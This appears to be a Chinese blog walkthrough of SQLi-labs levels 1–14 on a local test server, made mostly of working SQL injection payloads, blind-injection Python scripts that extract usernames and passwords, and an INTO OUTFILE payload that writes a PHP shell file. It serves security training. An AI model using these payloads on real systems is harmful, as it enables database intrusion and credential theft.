目录
第一关(字符型注入)
第二关(数字型注入)
第三关(闭合方式不同)
第四关(用双引号闭合)
第五关(不会数据回显)
第六关(闭合方式不同双引号 ”)
第7关(outfile注入)
第八关(布尔盲注)
第九关(时间盲注)
第十关(闭合方式不同)
第十一关(post注入)
第十二关(闭合方式不同双引号)
第十三关(报错注入)
第十四关(双引号)
第一关(字符型注入)
判断注入是否存在
http://127.0.0.1/sqllabs/Less-1/?id=1
判断sql语句是否拼接
http://127.0.0.1/sqllabs/Less-1/?id=1'
http://127.0.0.1/sqllabs/Less-1/?id=1'--+
可以根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显,所以我们可以使用联合查询。
联合注入
爆列
首先知道表格有几列,如果报错就是超出列数,显示正常则是没有超出列数(使用二分法,先查看一个大的数值,显示正常,则翻倍,报错则缩小一半数值)
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 5--+
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 3--+
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 4--+
爆显示位
由于我们已经知道了这个表有三列,所以我们使用联合查询来爆出显示位
http://127.0.0.1/sqllabs/Less-1/?id=1' union select 1,2,3--+
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,3--+
由于只能查看一组数据,所以我们需要修改id值,让他要么远超这个数据表,要么小于0
爆数据库名和版本号
我们知道了回显的列数是第二列和第三列,所以我们可以直接爆出数据库名和版本号
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,database(),version()--+
爆表
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
information_schema.tables表示该数据库下的tables表,group_concat() 是将查询结果连接起来(显示出一行数据),如果不用group_concat()查询到的结果只有user。
爆字段名
我们通过sql语句查询后的结果知道当前数据库有四个表,根据表名猜测账户和密码可能在users表中
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name内。
由查询到的结果,猜测username和password是账户名和密码
获取用户名和密码
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(username ,0x3a , password) from users--+
第二关(数字型注入)
判断是否有注入问题
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉
http://127.0.0.1/sqllabs/Less-2/?id=1'
http://127.0.0.1/sqllabs/Less-2/?id=1'--+
http://127.0.0.1/sqllabs/Less-2/?id=1
http://127.0.0.1/sqllabs/Less-2/?id=1--+
联合注入
爆列(和第一关一样的思想)
http://127.0.0.1/sqllabs/Less-3/?id=1' order by 5--+
http://127.0.0.1/sqllabs/Less-3/?id=1' order by 3--+
http://127.0.0.1/sqllabs/Less-3/?id=1' order by 4--+
爆数据库名和版本号
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,database(),version()--+
爆表
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
爆字段名
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
获取用户名和密码
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(username ,0x3a , password) from users--+
第三关(闭合方式不同)
http://127.0.0.1/sqllabs/Less-3/?id=1'
http://127.0.0.1/sqllabs/Less-3/?id=1'--+
http://127.0.0.1/sqllabs/Less-3/?id=1')
http://127.0.0.1/sqllabs/Less-3/?id=1')--+
输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,猜想一下咱们输入1在数据库语句中的位置,形如select … from … where id=( ‘1’) …,在第一题中id=1’的后面单引号加上),其它保持不变就行了。
联合注入
http://127.0.0.1/sqllabs/Less-3/?id=1'
http://127.0.0.1/sqllabs/Less-3/?id=1'--+
http://127.0.0.1/sqllabs/Less-3/?id=1')
http://127.0.0.1/sqllabs/Less-3/?id=1')--+
闭合方式改成()
包数据库和version
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,database(),version()--+
爆表
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
爆字段
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
获取用户名和密码
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(username ,0x3a , password) from users--+
第四关(用双引号闭合)
然后跟前几关一样
http://127.0.0.1/sqllabs/Less-3/?id=-1") union select 1,2,group_concat(username ,0x3a , password) from users--+
第五关(不会数据回显)
不显示只有对错页面显示我们可以选择布尔盲注,报错注入。布尔盲注主要用length(),ascii() ,substr()这三个函数,但是我这一关不打算用布尔盲注。报错注入主要使用updatexml()、extractvalue()、floor()三个函数。
http://127.0.0.1/sqllabs/Less-5/?id=1'
http://127.0.0.1/sqllabs/Less-5/?id=1'--+
这一关我使用updatetexml注入
爆数据库名和版本号
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat('~',(select database()),'~'),1)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat('~',(select version()),'~'),1)--+
爆表
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+
爆字段名
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)--+
获取用户名和密码
updatetexml 一次性只能显示32个数据,所以我们需要截取
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),1)--+
extractvalue()注入
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select version()),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e))--+
floor()注入
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
第六关(闭合方式不同双引号 ”)
第7关(outfile注入)
需要知道对方文件在哪 才可以利用 (比较鸡肋)
通常面试会这样问
mysql 怎么上传一个shell 导出一个shell
1、必须有权限
2、secure_file-priv 必须为空值(不是null)
3、对方网站的文件物理地址
http://127.0.0.1/sqllabs/less-7/?id=-1%27))%20union%20select%201,user(),%27%3C?php%20phpinfo();?%3E%27%20into%20outfile%20%22F:\\phpstudy_pro\\WWW\\sqllabs\\webshell.php%22--+
第八关(布尔盲注)
你会发现,输入什么都不会显示报错,只会有一个you are in…… 所以我们得想到什么形式会显示一真一假 布尔类型
写python爬虫,让他自己去爆
爆数据库名
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 20):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(database(),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
结果
爆表
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 32):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(concat((select group_concat(table_name)from information_schema.tables where table_schema='security')),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
结果
爆字段名
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 32):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(concat((select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users')),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
获取用户名和密码
import requests
#第8关
def inject_database(url):
name = ''
for i in range(1, 1000):
min_value = 32
max_value = 128
mid = (min_value + max_value) // 2
while min_value < max_value:
payload = "?id=1' and ascii(substr(concat((select group_concat(username ,0x3a , password) from users)),%d,1))> %d--+" % (i, mid)
r = requests.get(url + payload)
if "You are in..........." in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-8/'
inject_database(url)
第九关(时间盲注)
这一关输入的sql语句无论对错,都只会显示You are in...........,因此,我们判断这一关需要时间盲注来进行闯关。(让浏览器沉睡)
继续写python爬虫
前边都跟第八关差不多 我只写了最终结果
import requests
import time
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "?id=1' and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d, sleep(3), 0)--+" % (i, mid)
start_time = time.time()
r = requests.get(url + payload)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-9/'
inject_database(url)
第十关(闭合方式不同)
双引号闭合
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = '?id=1" and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d, sleep(1), 0)--+' % (i, mid)
start_time = time.time()
r = requests.get(url + payload)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
return name
if __name__ == "__main__":
url = 'http://127.0.0.1/sqllabs/Less-10/'
inject_database(url)
————————————————
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
原文链接:https://blog.csdn.net/huizhaohaha/article/details/138783298
第十一关(post注入)
查看页面
我们发现username 是注入点
百变不离其尊(跟get传参差不多)
我们发现联合查询注入是可行的,接下来就是该爆数据库、表、字段和用户账号密码
aaa' union select 1,database()#
aaa' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa' union select 1,group_concat(username ,0x3a , password) from users#
第十二关(闭合方式不同双引号)
aaa") union select 1,database()#
aaa") union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa") union select 1,group_concat(username ,0x3a , password) from users#
第十三关(报错注入)
aaa') and updatexml(1,user(),1)#
aaa') and updatexml(1,concat('~',(select database()),'~'),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#
由于只能显示一个字段,所以我们使用limit进行逐个输出
第十四关(双引号)
闭合方式不同
aaa" and updatexml(1,user(),1)#
aaa" and updatexml(1,concat('~',(select database()),'~'),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#